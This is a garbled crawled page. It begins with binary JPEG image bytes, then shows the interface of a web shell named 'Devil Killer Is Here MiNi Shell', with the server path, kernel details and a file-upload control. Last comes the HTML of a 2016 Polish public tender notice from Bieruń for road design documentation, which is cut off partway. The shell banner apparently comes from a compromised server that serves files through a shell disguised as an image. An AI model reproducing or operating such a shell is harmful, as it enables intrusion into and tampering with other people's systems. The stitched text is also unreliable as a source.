JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160414/89836-N-2016.html

<p class="kh_header"><b>Bieruń: BUDOWA BOCZNEJ DROGI UL. BOJSZOWSKIEJ DO WIEŻY CIŚNIEŃ
 - DOKUMENTACJA PROJEKTOWA</b><br>
<b>Numer ogłoszenia: 89836 - 2016; data zamieszczenia: 14.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 32 3242400, faks 32 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BUDOWA BOCZNEJ DROGI UL. BOJSZOWSKIEJ DO WIEŻY CIŚNIEŃ
 - DOKUMENTACJA PROJEKTOWA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia
Przedmiotem zamówienia jest wykonanie kompleksowej dokumentacji projektowo-kosztorysowej budowy bocznej drogi ul. Bojszowskiej do wieży ciśnień wraz z uzyskaniem decyzji o pozwoleniu 
na budowę.  
Celem jest poprawa funkcjonalności i parametrów technicznych drogi oraz poprawa bezpieczeństwa uczestników ruchu drogowego. Teren jest objęty miejscowym planem zagospodarowania przestrzennego. Obszar objęty projektowaniem podlega wpływom eksploatacji górniczej.

Zakres prac.
Projekt będzie obejmował budowę ciągu pieszo-jezdnego na odcinku od ul. Bojszowskiej do wieży ciśnień o długości około 210,0 m wraz dowiązaniem do istniejącego zagospodarowania terenu. 
W ramach zadania należy zaprojektować odwodnienie oraz oświetlenie uliczne. Istniejące, kolidujące z przedmiotową inwestycją sieci należy przebudować. Ponadto należy skablować sieć teletechniczną 
na całym odcinku drogi. 
Parametry techniczne drogi:
- ciąg pieszo-jezdny
- kategoria ruchu: KR3
Wykonawca w pierwszej kolejności wykona i przedstawi zamawiającemu do zaopiniowania koncepcję układu drogowego. Koncepcja musi być opracowana na aktualnych podkładach mapowych z nakładką ewidencji (mapy do celów projektowych muszą być zweryfikowane przez wykonanie domiarów 
w terenie). 
W tym celu należy dostarczyć do siedziby Zamawiającego 2 egz. koncepcji w wersji papierowej 
w skali 1:500. Pozytywnie zaopiniowana koncepcja przez zamawiającego będzie stanowić podstawę do dalszego projektowania. 
W ramach dokumentacji należy wykonać projekty budowlane i projekty wykonawcze układu drogowego dla wszystkich branż. Projekty muszą stanowić kompletną dokumentację pozwalającą 
na realizację inwestycji. Wszystkie etapy projektowania należy konsultować z zamawiającym.

Zakres zadania obejmuje w szczególności:
Wykonanie dokumentacji fotograficznej terenu objętego zadaniem.
Wykonanie inwentaryzacji zieleni .
Wykonanie badań i dokumentacji geotechnicznej (wg potrzeb) w zakresie koniecznym do opracowania całości dokumentacji projektowej. Badania geotechniczne podłoża gruntowego wykonać zgodnie z załącznikiem nr 4 do Rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. Nr 43 poz. 430). Badania winny określać w szczególności:   wskaźnik nośności CBR, moduły odkształcenia: pierwotny (E1) i wtórny (E2) oraz ocenę przydatności gruntu podłoża dla inwestycji drogowej. Rozstaw otworów badawczych co 50 m (na głębokość min. 3 m pod konstrukcje drogi). 
Uzyskanie map do celów projektowych.
Pozyskanie informacji na temat właścicieli terenów zajętych pod projektowaną drogę.
	Dokumentację projektową należy opracować na aktualnych podkładach mapowych z nakładką ewidencji. 
 Wykonawca musi uzyskać mapy sytuacyjno-wysokościowe zgodne ze stanem faktycznym 
w terenie, w tym celu należy m.in.:
- przeprowadzić wywiad terenowy,
- wykonać pomiary terenowe mające na celu aktualizację istniejącej mapy zasadniczej, w tym zaznaczenie wszelkich obiektów budowlanych, usytuowania zieleni, odszukanie punktów granicznych, uzgodnienie map w instytucjach branżowych.
Uzyskanie wypisów i wyrysów z ewidencji gruntów (aktualny stan ewidencji gruntów i budynków).
Uzyskanie warunków budowy nowych i przebudowy istniejących sieci.
Wykonanie projektów budowlanych i wykonawczych, które powinny zawierać w szczególności:
- szczegółowy opis techniczny,
- niezbędne analizy i obliczenia,
- dokładny opis stosowanych materiałów i urządzeń,
- informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ), 
- inwentaryzację istniejącej zieleni przeznaczonej do wycinki oraz projekt nasadzeń zieleni,
- część rysunkową.    
W szczególności należy opracować projekty w następujących branżach:
projekt zagospodarowania terenu, projekt drogowy;
projekt oświetlenia ulicznego;
Projektowane oświetlenie należy zaprojektować na słupach aluminiowych pełnych 
(np. typu SAL) i oprawach oświetleniowych typu LED (np. LED BPP007, LED BGP340, TECE01-00-NW01 OAI) z wysięgnikiem lub podobnego typoszeregu. Dobierając oprawy oświetleniowe LED należy założyć możliwość minimum 3-stopniowej regulacji natężenia oświetlenia. Jesteśmy otwarci na inne (lepsze) rozwiązania oszczędne, estetyczne 
i wandala-odporne. Przed podjęciem ostatecznych prac projektowych Inwestor będzie oczekiwał przedstawienia od projektanta koncepcji wraz z uzasadnieniem ekonomicznym dla danego rodzaju oświetlenia. Zasilanie projektowanego oświetlenia musi się odbywać się 
z osobnej szafki zasilania i sterowania oświetleniem ulicznym SZiSOU. Dokumentacja projektowa powinna być oparta o materiały i osprzęt umożliwiający monitorowanie, sterowanie, kontrolę i zarządzanie zaprojektowanym oświetleniem. System telemanagmentu służący do monitorowania, kontroli i zarządzania oświetleniem powinien być oparty o technologie sieciowe umożliwiające przesyłanie danych po sieci Ethernet lub sieci komórkowej 2G/3G/LTE.
System sterowania oświetleniem powinien zapewnić realizację poniższych funkcji:
zdalny nadzór (monitorowanie, sterowanie, konfiguracja) przez sieć internetową 
z poziomu przeglądarki internetowej- bez konieczności instalowania dodatkowego oprogramowania. Dostęp do interfejsu użytkownika jest możliwy z dowolnego  urządzenia wyposażonego w dostęp do internetu i przeglądarkę internetową,
graficzny  interfejs w  postaci  strony  internetowej  wraz  z  mapą, na której 
za  pomocą  ikon reprezentowane są wszystkie  punkty należące do systemu,
redukcję mocy pojedynczych opraw oświetleniowych, grup opraw lub wszystkich opraw,
załączanie i wyłączanie pojedynczej oprawy,
możliwość podłączenia do dowolnej oprawy czujnika (np. ruchu), który będzie sterował pracą pojedynczej oprawy lub grupy opraw (niezależnie od ich fizycznego połączenia) ,
automatyczną redukcję mocy zgodnie z zaprogramowanymi krzywymi redukcji,
zaprogramowanie  oddzielnych krzywych redukcji dla dni roboczych (poniedziałek-piątek) oraz weekendów (sobota-niedziela),
zaprogramowanie  dni szczególnych  np. dni świątecznych,  podczas których oświetlenie powinno mieć odmienną charakterystykę,
zmianę poziomu redukcji mocy poprzez zdalne przeprogramowanie w dowolnym momencie,
pomiar    prądu,   napięcia,    mocy,   współczynnika mocy,   czasu   pracy   źródła światła dla pojedynczego  punktu świetlnego,
dostęp do danych historycznych,
uwzględnienie zaprojektowanego  współczynnika  utrzymania - utrzymanie stałego strumienia świetlnego w czasie,
możliwość  zaprogramowania wirtualnej mocy oprawy (w zakresie charakterystyki   pracy źródła),
sygnalizowanie uszkodzonego źródła światła lub statecznika, zaniku napięcia zasilającego, błędów komunikacji, przekroczonego poziomu mocy lub temperatury,
generowanie raportów zużycia energii oraz raportów błędów.
Zastosowany system ma prowadzić do oszczędzania energii elektrycznej, zmniejszenia emisji gazów cieplarnianych, zwiększenia niezawodności oświetlenia i obniżenia kosztów jego utrzymania.
projekt kanalizacji deszczowej;
projekt przebudowy sieci teletechnicznej (skablowanie sieci);
projekty przebudowy kolidujących sieci uzbrojenia terenu (np. wodociąg, gazociąg, kanalizacja sanitarna);
projekt kanału teleinformatycznego;
projekt kanału technologicznego;
projekty przebudowy kolidujących obiektów budowlanych (np. ogrodzenia, przepusty)
uzgodniony i zatwierdzony projekt docelowej organizacji ruchu (należy uwzględnić oznakowanie  ulic tabliczkami z ich nazwami);
uzgodniony i zatwierdzony projekt organizacji ruchu na czas prowadzenia robót;
inne projekty branżowe niezbędne do uzyskania decyzji o pozwoleniu na budowę.
6)    Opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych.
7)    Wykonanie przedmiarów robót (odrębnie dla każdej branży).
8)    Wykonanie kosztorysów inwestorskich (odrębnie dla każdej branży) i zbiorczego 
        zestawienia kosztów.
9)  Wszelkie konieczne do realizacji zamówienia oraz rzeczowego wykonania inwestycji (budowy) wywiady środowiskowe, uzgodnienia, opinie, zgody, zatwierdzenia, decyzje, pozwolenia, w tym m.in.: postanowienia, informacje, sprawdzenia, zgłoszenia, decyzje środowiskowe, pozwolenia wodno-prawne, uzgodnienie OUG, decyzja o wycince drzew, decyzja o pozwoleniu na budowę, itp.
Do obowiązków Projektanta, jako pełnomocnika Zamawiającego, należy również uzyskanie zgód właścicieli na dysponowanie nieruchomością na cele budowlane, w zakresie niezbędnym do wykonania inwestycji, na podstawie przedstawionego im planu zagospodarowania.
10) W przypadku konieczności sporządzenia raportu oddziaływania na środowisko koszt jego wykonania należy uwzględnić w cenie ofertowej i uzyskać decyzję o środowiskowych uwarunkowaniach dla zadania.
11)   Wykonanie i skompletowanie wszelkich niezbędnych załączników do wniosku i uzyskanie   
        decyzji o pozwoleniu na budowę.  
12)   Wykonawca zobowiązany będzie do: 
a) 	świadczenia usług z należytą starannością, zgodnie z najlepszymi praktykami stosowanymi przy projektowaniu;
b)  zapewnienia kompetentnego personelu do realizacji zamówienia, który będzie  
     współpracował z osobami wskazanymi przez zamawiającego;
c)  uzgadniania harmonogramu prac z zamawiającym;
d)  uzgadniania koncepcji zamierzenia projektowego z zamawiającym;
e) współdziałania z zamawiającym przy realizacji dokumentacji projektowej oraz do uczestnictwa w spotkaniach roboczych i konsultacjach; wymagane przynajmniej 2 spotkania w miesiącu 
w siedzibie Zamawiającego lub w miejscu przez niego wskazanym;
f)  udzielania wyjaśnień na pisemne zapytania zamawiającego lub wykonawcy robót budowlanych w trakcie prowadzenia postępowania o udzielenie zamówienia publicznego na zaprojektowane roboty budowlane (bez dodatkowego wynagrodzenia) w terminach umożliwiających zamawiającemu sprawne przeprowadzenie takiego postępowania.

4.  Przepisy
	Dokumentacja projektowo - kosztorysowa musi być opracowana w szczególności zgodnie z: 
Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t. j. Dz.U. z 2015 r., poz. 2164) jej zmianami oraz aktami wykonawczymi do ustawy pzp.  Zgodnie z art. 29 ust. 3 ustawy pzp : Przedmiotu zamówienia nie można opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i Zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny.
Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (t. j. Dz.U. z 2013 r., poz.1129.), jego zmianami lub innym aktem wykonawczym  do ustawy pzp wydanym w miejsce w/w.
Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym  (Dz.U. z 2004 r., nr 130, poz. 1389), jego zmianami lub innym aktem wykonawczym do ustawy pzp wydanym w miejsce w/w.
Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (t. j. Dz.U. z 2013 r., poz.1409 z późniejszymi zmianami) oraz zgodnie z aktami wykonawczymi do tej Ustawy.
Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz.U. z 2003 r., nr 120, poz. 1126).
Ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz.U. z 2014 r., poz. 883 z późniejszymi zmianami) oraz aktami wykonawczymi do tej ustawy.
Ustawą z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym t. j. Dz.U. z 2015 r., poz. 199 z późniejszymi zmianami).
Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w sprawie warunków technicznych, jakim powinny odpowiadać drogowe  obiekty inżynierskie i ich usytuowanie (Dz.U. z 2000 r., nr 63, poz. 735 z późniejszymi zmianami).
Ustawą z 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (t. j. Dz.U. z 2015 r., poz.2031 z późniejszymi zmianami),
Ustawą z 21 marca 1985 r. o drogach publicznych (t. j. Dz.U. z 2015 r. poz. 460 z późniejszymi  zmianami).
Ustawą Prawo wodne z 18 lipca 2001 r. (t. j. Dz.U. z 2015 r., poz.469 z późniejszymi zmianami),
Ustawą o ochronie przyrody  z 16 kwietnia 2004 r. (t. j. Dz.U. z 2015 r., poz.1651 z późniejszymi zmianami).
Ustawą Prawo ochrony środowiska  z 27 kwietnia 2001 r. (t. j. Dz.U. z 2013 r., poz.1232 z późniejszymi zmianami).
Rozporządzeniem Rady Ministrów z dnia 9 listopada 2010 r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (t. j. Dz.U. z 2016 r., poz. 71).
Ustawą z dnia 9 czerwca 2011 r. Prawo geologiczne i górnicze (t. j. Dz.U. z 2015 r., poz. 196 z późniejszymi zmianami).
Rozporządzenie Ministra Środowiska z dnia 20 grudnia 2011 r. w sprawie szczegółowych wymagań dotyczących projektów robót geologicznych, w tym robót, których wykonywanie wymaga uzyskania koncesji (Dz.U. z 2011 r., nr 288, poz.1696).
Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz.U. z 2003 r., nr 220, poz. 2181 z późniejszymi zmianami).
Rozporządzeniem Ministra Środowiska w sprawie dokumentacji hydrogeologicznej i dokumentacji geologiczno-inżynierskiej (Dz.U. z 2014 r., poz. 596).
Ustawą Prawo geodezyjne i kartograficzne z dnia 17 maja 1989 r. (t. j. Dz.U. z 2015 r., poz. 520 z późniejszymi zmianami).
Rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz.U. z 1995 r., nr  25, poz. 133).
Rozporządzeniem Ministrów Spraw Wewnętrznych i Administracji oraz Rolnictwa i Gospodarki Żywnościowej w sprawie rozgraniczania nieruchomości (Dz.U. z 1999 r., nr 45, poz. 453).
Ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (t. j. Dz.U. z 2013 r., poz. 1235 z późniejszymi zmianami).
Oraz innymi obowiązującymi przepisami prawa (w tym: ochrony ppoż., bhp, sanepid, ochrony środowiska), przepisami o prawie autorskim i prawach pokrewnych, przepisami techniczno-budowlanymi, normami, katalogami, wytycznymi, instrukcjami.

5.  Uwagi końcowe
Opracowana dokumentacja projektowo-kosztorysowa powinna być wykonana w stanie kompletnym  z punktu widzenia celu, któremu ma służyć.
Powinna zawierać wszystkie materiały geodezyjne, prawne, potwierdzone wnioski (o wydanie decyzji                            i dokumentów), uzyskane uzgodnienia, opinie, inne dokumenty.
Dokumentacja musi być zaopatrzona w oświadczenie o kompletności.
Dokumentacja musi spełniać wszystkie wymogi konieczne do uzyskania: decyzji o pozwoleniu 
na budowę.
Wycena powinna uwzględnić uzyskanie wszelkich koniecznych uzgodnień, pozwoleń                          i decyzji administracyjnych dla realizacji w/w projektu.
Wykonawca na podstawie wykonanej dokumentacji projektowej musi uzyskać: decyzję
o pozwoleniu na budowę.
Przedmiary robót oraz kosztorys inwestorski powinny obejmować wszystkie konieczne roboty
związane z realizacją zadania.
Projekty budowlane należy przedłożyć Zamawiającemu:
w wersji papierowej w 7 egzemplarzach (2 egz. pozostaną w Starostwie Powiatowym w Bieruniu),
w wersji elektronicznej, w 2 egzemplarzach na płytce CD (w formacie PDF oraz w wersji umożliwiającej jego przetwarzanie, np. dwg, doc). 
Projekty wykonawcze oraz specyfikacje techniczne wykonania i odbioru robót należy wykonać (oddzielnie dla każdej części zamówienia):
w wersji papierowej w 5 egzemplarzach,
w wersji elektronicznej, w 2 egzemplarzach na płytce CD (w formacie PDF oraz w wersji umożliwiającej jego przetwarzanie, np. dwg, doc). 
Kosztorysy inwestorskie oraz przedmiary robót należy wykonać (oddzielnie dla każdej części zamówienia):
w wersji papierowej w 2 egzemplarzach,
w wersji elektronicznej, w 2 egzemplarzach na płytce CD (w formacie PDF oraz w wersji umożliwiającej jego przetwarzanie - excel oraz ath),
należy wykonać zbiorcze zestawienie kosztów.
Koncepcję należy opracować:
w wersji papierowej w 2 egzemplarzach,
w wersji elektronicznej, w 1 egzemplarzu na płytce CD (w formacie PDF oraz w wersji umożliwiającej jego przetwarzanie, np. dwg, doc). 
Dokumentacja musi odpowiadać wymaganiom Rozporządzenia Ministra Infrastruktury
z dn. 02.09.2004 r. w sprawie szczegółowej formy dokumentacji projektowej, specyfikacji
technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego
(Dz.U.202.2004.2072 z późn. zm.).
Przyjęte w trakcie projektowania rozwiązania technologiczne i materiały należy konsultować 
z zamawiającym oraz uzyskać jego akceptację.
Dokumentacja projektowo-kosztorysowa będzie służyć jako opis przedmiotu zamówienia do przetargu - zgodnie z Ustawą Prawo Zamówień Publicznych - na wyłonienie wykonawcy robót budowlanych oraz realizację robót na jej podstawie. 
Dokumentacja w swojej treści powinna określać parametry techniczne zastosowanych materiałów, urządzeń i wyposażenia oraz technologię robót w taki sposób aby nie utrudniać uczciwej konkurencji.

Projektant zobowiązany jest do opisywania proponowanych materiałów i urządzeń
za pomocą parametrów technicznych, tzn. bez podawania ich nazw, znaków wskazujących
na producenta.
Do obowiązków Wykonawcy, w ramach wykonania przedmiotu zamówienia, będzie też należał udział w procedurze wyboru Wykonawcy robót budowlanych w zakresie udzielania odpowiedzi na zapytania dotyczących rozwiązań zawartych w dokumentacji projektowej.
Wymagania w zakresie realizacji zamówienia zawiera również wzór umowy, stanowiący załącznik do SIWZ.
Zamawiający nie przewiduje: udzielania zamówień uzupełniających, dynamicznego systemu zakupów, aukcji elektronicznej, zawarcia umowy ramowej w rozumieniu ustawy pzp oraz udzielania zaliczek na poczet wykonania umowy, stosowania wymagań, o których mowa w art. 29 ust.4 ustawy pzp. Zamawiający nie dokonuje zastrzeżenia, o którym mowa w art. 36a ust.2 pkt 1 ustawy pzp. 
W postępowaniu ma zastosowanie przesłanka wykluczenia Wykonawcy zawarta w art. 24 ust. 2a ustawy pzp. Treść art. 24 ustawy pzp stanowi załącznik do SIWZ.
Zamawiający nie dopuszcza składania ofert częściowych wariantowych.


6. Nazwy i kody Wspólnego Słownika Zamówień ( CPV):
71000000-8 Usługi architektoniczne, budowlane, inżynieryjne i kontrolne
71242000-6 Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów
71245000-7 Plany zatwierdzające, rysunki robocze i specyfikacje
71320000-7 Usługi inżynieryjne w zakresie projektowania.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.20.00-6, 71.24.50.00-7, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 900 zł (słownie: dziewięćset złotych). Zasady, formy, termin oraz tryb wnoszenia wadium określone zostały w specyfikacji istotnych warunków zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki dotyczące:
Posiadania  uprawnień do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
	Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez Wykonawcę: 
	- oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. ocena nastąpi  łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki dotyczące:
Posiadania wiedzy i doświadczenia: 
Wykonali należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; co najmniej jedną dokumentację projektową budowy drogi lub ciągu pieszo-jezdnego o nawierzchni bitumicznej lub z kostki brukowej betonowej o długości co najmniej 200 m.
Ocena spełnienia warunku będzie dokonana wg zasady spełnia / nie spełnia, na podstawie przedłożonego przez Wykonawcę: 
1)	oświadczenia (zgodnie z art. 22 ust.1 pkt 2 ustawy pzp ) ,
2)	dokumentu: wykazu wykonanych głównych usług (co najmniej jedna dokumentacja projektowa budowy drogi lub ciągu pieszo-jezdnego o nawierzchni bitumicznej lub z kostki brukowej betonowej o długości co najmniej 200 m) wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane z załączeniem dowodów, czy zostały wykonane należycie. 
Dowodami są:
1)	poświadczenie,
